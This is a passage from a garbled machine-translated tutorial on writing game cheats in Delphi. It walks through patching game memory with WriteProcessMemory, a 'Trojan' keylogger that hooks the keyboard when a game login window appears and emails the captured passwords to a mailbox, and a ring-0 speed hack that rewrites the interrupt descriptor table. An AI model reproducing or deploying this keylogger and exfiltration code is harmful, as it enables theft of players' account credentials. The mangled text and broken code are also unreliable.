// Handle Inheritance Flag DWord DWProcessid //// Process ID ENTIFIER); in dwdesiredAccess is where you have access mode, it can set a lot, we use as long as you use process_all_access to open the process, other ways we can check MSDN.
4, after opening the process, we can use the function to operate, here we use WriteProcessMemory to write data to the memory address (other way of operation, such as: ReadProcessMemory, I am here. introduced a), we look at WriteProcessMemory usage: BOOL WriteProcessMemory (hANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data toDWORD nsize, // Number of bytes to Writelpdword LPNUMBEROFBYTESWRITEN // Actual Number Of Bytes Written; 5, the following is done with CloseHandle Close process handle.
This is a method of implementing some of this type of game, well, there is this method, we have a rational understanding, let's take a look at the actual example, improve our sense of mind, the following is the plug-in XX game code, we correspond according to the above method to look at it: constResourceOffset: dword = $ 004219F4; resource: dword = 3113226621; ResourceOffset1: dword = $ 004219F8; resource1: dword = 1940000000; ResourceOffset2: dword = $ 0043FA50; resource2: dword = 1280185; ResourceOffset3: dword = $ 0043FA54; resource3: dword = 3163064576; ResourceOffset4: dword = $ 0043FA58; resource4: dword = 2298478592; varhw: HWND; pid: dword; h: THandle; tt: Cardinal; beginhw: = FindWindow ( ' XX ', nil); if hw = 0 thenExit; GetWindowThreadProcessId (hw, @pid); h: = OpenProcess (PROCESS_ALL_ACCESS, false, pid); if h = 0 thenExit; if flatcheckbox1.Checked = true thenbeginWriteProcessMemory (h, Pointer ( ResourceOffset), @Resource, sizeof (Resource), tt); WriteProcessMemory (h, Pointer (ResourceOffset1), @ Resource1, sizeof (Resource1), tt); end; if flatcheckbox2.Checked = true thenbeginWriteProcessMemory (h, Pointer (ResourceOffset2) , @ Resource2, sizeof (resource2), tt); WriteProcessMemory (H, Pointer (resourceoffset3), @reso Urce3, sizeof (resource3), tt); WriteProcessMemory (h, pointer (resourceoffset4), @ resource4, sizeof (resource4), tt); end; messagebeep (0); CloseHandle (h); close; this game is used The address verified the data to be submitted, so this type of game plug-in production is not very difficult, and it is hard to find these addresses. Trojan plug-in roof plug-in, maybe mostly like Trojans, is the Southam Side East that helps do plug-in accounts and passwords. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology.
We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox. I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can easily implement it with the FindWindow function: hWnd FindWindow (lpctstr lpclassname, // pointer to class namelpctstr lpwindowname // Pointer to window name); actual program implementation, we have to find the 'XX' window , Use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information. First song we use SetWindowsHookEx set up monitoring logs, and usage of this function is as follows: HHOOK SetWindowsHookEx (int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of Thread to install hook for; here to explain here, we have to do this for HookProc here, and Hinstance here, you can use this program's Hinstance, and the specific implementation method is: hHook: = SetWindowsHookEx (WH_JOURNALRECORD, HookProc, hInstance, 0); and HOOKPROC will function in a little more complex: function HookProc (iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then file : // If you find the window Begin if (PEVENTMSG (LPARAM) ^. Message = WM_KEYDOWN) THEN FILE: // Message is equal to the keyboard Press HookKey: = HookKey Form1.KeyHOKRESULT (PEVENTMSG (LPARAM) ^. Paraml, Peventmsg (LPARAM ) ^. paramh; file: // Take KeyHOKRESULT (Customized function, the main function is the message parameter of the conversion interception is the button name. I will convert the conversion function in the article. If Length> 0 THEN FILE: // If you get the key name begin write (hookkeyfile, hookkey); file: // write the button name to the text file hookkey: = '; end; end; end; or more is record The entire process of the keyboard, simple, if you record it, don't forget to release it, UnHookWindowshookex (HHOOK), and hHOOK, the handle returned after setting SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it.
Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi. The code is as follows: assignfile (readfile, 'hook.txt'); file: // Open hook.txt This text file reset (READFILE); file: // Set to a way to read how much not Eof (readfile) Do File: / / When you do not read the file tail becom readln (readfile, s, j); file: // read file line body: = body s; end; firly closefile; file: // Turn file end; nmsmtp1. EncodeType: = UUMIME; File: // Set the encoded nmsmtp1.postMessage.attachments.text: = '; file: // Set attachment nmsmtp1.postMessage.Fromaddress: =' xxx@xxx.com '; file: // Set source Email address nmsmtp1.postMsSage.toaddress.text: = 'xxx@xxx.com'; / set the target email address nmsmtp1.postMessage.Body.text: = 'password' ' B accelerated plug-in original I have always thought acceleration plug-in It is written for a game, and later discovered that this concept is wrong. The so-called acceleration plug is actually the purpose of modifying the clock frequency to accelerate. In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not.
Windows is a 32-bit operating system. It is not what you want to change (Microsoft's stuff is so domineering, say no change to you), but it is not impossible, we can Implementation by two methods: The first is to write a hardware driver, the second is to implement it with RING0 (this method is the author of CIH Chen Yinghao first, its principle is to modify the IDE table -> Create an interrupt Door -> Enter Ring0-> Call the interrupt modification vector, but there is no way to implement this * _ *, as a senior language user!), Use the first method to trouble, so we Here, use the second method to implement it ~~~ We will take a look before implementation: 1, we must first write a process to embed the assembly language in this process to implement the IDE table, create interrupt gate, modify vector Waiting for work 2, call this process to achieve acceleration function, now there is, we will explain it while watching the code: First we build a process, this process is the core part of this program: Procedure String (Value: Word ); stdcall; const zdh = $ 03; // set a interrupt number Varidt: array [0..5] of byte; // Save the IDT table OG: DWORD; // Store the old vector beginasmpush EBXSIDT IDT // Read Interrupt Description Frame MOV EBX, DWORD PTR [IDT 2] // IDT Subterite Add EBX, 8 * ZDH // Calculation Interrupt in the Interrupt Descriptor Table CLI // Off MOV DX, WORD PTR [EBX 6 ] SHL EDX, 16D MOV DX, WORD PTR [EBX] MOV [OG], EDX MOV EAX, OFFSET @@ Ring0 // Points to Ring0 Grade Dip MOV Word PTR [EBX], AX / / Low 16-bit, saved in 1 2-bit SHR EAX, 16DMOV WORD PTR [EBX 6], AX // High 16-bit, saved in 6, 7-bit int zdh // interrupt MOV EBX, DWORD PTR [IDT 2] // Reposition Add EBX, 8 * ZDHMOV EDX, [OG] MOV WORD PTR [EBX], DXSHR EDX, 16DMOV WORD PTR [EBX 6], DX // Recovered Vector Pop ebxjmp @@ EXISM / / EXITASM @@ ring0: // Ring0, this is also Is the most core Dongdong MOV Al, $ 34 // Write 8253 Control Register OUT $ 43, Almov AX, Value // Write Time Value OUT $ 40, Al // Write Value Low MOV Al, AHOUT $ 40, Al / / Write time value high IRETD // Return @@ EXITASM: End; end; the most core thing has been finished, most readers know it, I don't know how it happened, huh, huh, but I don't know how it happened.
